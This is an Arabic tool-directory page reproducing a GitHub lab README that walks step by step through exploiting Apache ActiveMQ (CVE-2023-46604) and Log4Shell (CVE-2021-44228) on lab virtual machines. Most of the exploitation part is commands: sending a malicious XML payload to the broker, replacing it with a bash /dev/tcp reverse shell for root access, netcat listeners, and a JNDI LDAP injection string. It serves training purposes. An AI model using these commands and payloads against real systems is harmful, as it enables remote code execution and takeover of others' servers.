Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-Lab — تعليمات لاستغلال الثغرات CVE-2021-44228 وCVE-2023-46604 | Kitploit
أدوات/GitHubGitHub/dcm2406/cve-lab
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubdcm2406/cve-lab

CVE-Lab

تعليمات لاستغلال الثغرات CVE-2021-44228 وCVE-2023-46604

عرض المستودع
24منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مختبر CVE-2023-46604

يوجه هذا المختبر حول استغلال ثغرات CVE-2023-46604

الإقرارات

  • Apache ActiveMQ
  • CVE-2023-46604

البيئة

يتطلب هذا المختبر تثبيت جهازين افتراضيين. جهاز كالي لينكس إصدار 2023.4 وجهاز أوبونتو إصدار 22.04.3 LTS. يمكنك تحميلها هنا:

  • Kali Linux 2023.4
  • Ubuntu 22.04.3 LTS
  • VMware-workstation-17.5.0 for windows
  • VMware-workstation-17.5.0 for linux

النموذج ومتطلبات النظام

على جهاز كالي لينكس:

تثبيت git

root@kitploit:~
$sudo apt install git

تثبيت gedit

root@kitploit:~
$sudo apt install gedit

على جهاز أوبونتو:

تثبيت git

root@kitploit:~
$sudo apt install git

تثبيت openjdk 18

root@kitploit:~
$sudo apt install openjdk-18-jdk

تثبيت حزمة ActiveMQ 5.18.2

root@kitploit:~
$sudo su
$git clone https://github.com/dcm2406/ApacheActiveMQ
$cd ApacheActiveMQ/
$tar -xf apache-activemq-5.18.2-bin.tar.gz

بناء الخادم (تشغيل خدمة activemq)

على جهاز أوبونتو افتح نافذة طرفية وقم بتشغيل الأمر كما يلي:

root@kitploit:~
$sudo su
$cd ApacheActiveMQ/apache-activemq-5.18.2/bin/linux-x86-64
$./activemq start

تحقق من حالة الخدمة:

root@kitploit:~
$./activemq status

إذا تم تشغيل الخدمة بنجاح، فسيظهر على شاشة الطرفية "ActiveMQ Brocker is running".

يمكنك أيضاً زيارة http://127.0.0.1:8161 لفتح مدير وسيط ActiveMQ. يتضمن اسم المضيف والإصدار والمعرف ووقت التشغيل وبعض المعلومات الأخرى.

الاستغلال

على جهاز كالي لينكس

تنزيل الموارد لعملية الاستغلال:

root@kitploit:~
$sudo su
$git clone https://github.com/dcm2406/CVE-2023-46604
$cd CVE-2023-46604
$ls

كما ترى، لدينا ملفان exploit.py و poc.xml:

  • ملف poc.xml يحتوي على قطعة من الكود الخبيث الذي يستغل ثغرة في بروتوكول OpenWire.
  • ملف exploit.py مسؤول عن تشفير HTTP وإرسال ملف poc.xml إلى Brocker على الجهاز الهدف. افتح خادم ويب في مسار الموارد:
root@kitploit:~
$cd CVE-2023-46604
$python3 -m http.server

افتح نافذة طرفية جديدة لإرسال ملف poc.xml إلى خادم الهدف عبر ملف exploit.py:

root@kitploit:~
$sudo su
$cd CVE-2023-46604
$python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml

بعد تنفيذ الأمر، يتم تشغيل تطبيق الآلة الحاسبة على الجهاز الهدف. وهذا يثبت أنه تم استغلال الثغرة بنجاح. نواصل إنشاء شل عكسي للتحكم في الجهاز الهدف.

افتح نافذة طرفية جديدة للاستماع لاتصالات الشل العكسي:

root@kitploit:~
$sudo su
$nc -nlvp 4444

عد إلى الطرفية السابقة وعدّل ملف poc.xml:

root@kitploit:~
$gedit poc.xml

استبدل القيمة gnome-calculator بـ bash -i >& /dev/tcp/192.168.132.130/4444 0>&1 واحفظ الملف.

إرسال الكود الخبيث مرة أخرى:

root@kitploit:~
$python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml

نتيجة هذا الأمر هي أننا حصلنا على شل الجذر على الجهاز الهدف. تم الاختراق!!!

مختبر CVE-2021-44228

الإقرارات

  • Apache log4j
  • CVE-2023-44228 - log4shell

البيئة

يتطلب هذا المختبر تثبيت جهازين افتراضيين. جهاز كالي لينكس إصدار 2023.4 وجهاز أوبونتو إصدار 22.04.3 LTS. يمكنك تحميلها هنا:

  • Kali Linux 2023.4
  • Ubuntu 22.04.3 LTS
  • VMware-workstation-17.5.0 for windows
  • VMware-workstation-17.5.0 for linux

النموذج ومتطلبات النظام

على جهاز كالي لينكس:

تثبيت git

root@kitploit:~
$sudo apt install git

تثبيت gedit

root@kitploit:~
$sudo apt install gedit

على جهاز أوبونتو:

تثبيت git

root@kitploit:~
$sudo apt install git

تثبيت docker

root@kitploit:~
$sudo apt install docker.io 

بناء خادم ويب

على جهاز أوبونتو

الخطوة 1: تنزيل openjdk

root@kitploit:~
$sudo su
$wget https://www.cs.ait.ac.th/~marikhu/installers/jdk-8u20-linux-x64.tar.gz
$tar -xf jdk-8u20-linux-x64.tar.gz

الخطوة 2: تنزيل وبناء ملف docker

root@kitploit:~
$sudo su
$git clone https://github.com/dcm2406/web-server-cve44228
root@kitploit:~
$docker build -t cve44228
$docker run --network host cve44228

بعد إكمال الأوامر المذكورة أعلاه، نحصل على موقع ويب. لتصفح الويب، يمكنك استخدام الرابط: http://<ubuntu_ip>:8080. في هذا البرنامج التعليمي، سيكون العنوان مشابهاً لـ: http://192.168.132.135:8080

الاستغلال

على جهاز كالي لينكس، قم بتنزيل الموارد اللازمة لاستغلال الثغرة

تنزيل poc

root@kitploit:~
$sudo su
$git clone https://github.com/kozmer/log4j-shell-poc
$pip install -r requirement.txt

تنزيل openjdk

root@kitploit:~
$sudo su
$wget https://www.cs.ait.ac.th/~marikhu/installers/jdk-8u20-linux-x64.tar.gz

//نقل ملف openjdk إلى المجلد الذي يحتوي على ملف poc
$mv jdk-8u20-linux-x64.tar.gz <path to the directory containing the poc file>

$tar -xf jdk-8u20-linux-x64.tar.gz   //فك ضغط الملف

افتح نافذة طرفية جديدة للاستماع لاتصالات الشل العكسي:

root@kitploit:~
$sudo su
$nc -nlvp 9001

تشغيل خدمات LDAP و HTTP مع ملف poc

root@kitploit:~
$sudo su
$cd log4j-shell-poc
$python3 poc.py --userip 192.168.132.130 --lport 9001 --webport 8080

سيعيد الأمر نتائج مشابهة لما يلي

root@kitploit:~
[!] CVE: CVE-2021-44228
Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up LDAP server

[+] Send me: ${jndi:ldap://192.168.132.130:1389/a}

[+] Starting Webserver on port 8080 http://0.0.0.0:8080
Listening on 0.0.0.0:1389

هنا، نحن مهتمون فقط بقيمة jndi المُنشأة. افتح متصفح ويب وأدخل عنوان الموقع الذي أنشأته سابقاً. قم بتسجيل الدخول باستخدام قيمة jndi. في هذا الوقت، تستقبل نافذة netcat اتصالاً. تم الاختراق!!!

التوثيق

CVE Research Report

الدعم

للدعم، أرسل بريداً إلكترونياً إلى [email protected]

المؤلفون

  • @dcm2406
  • @tCu0n9
تنزيل الأداة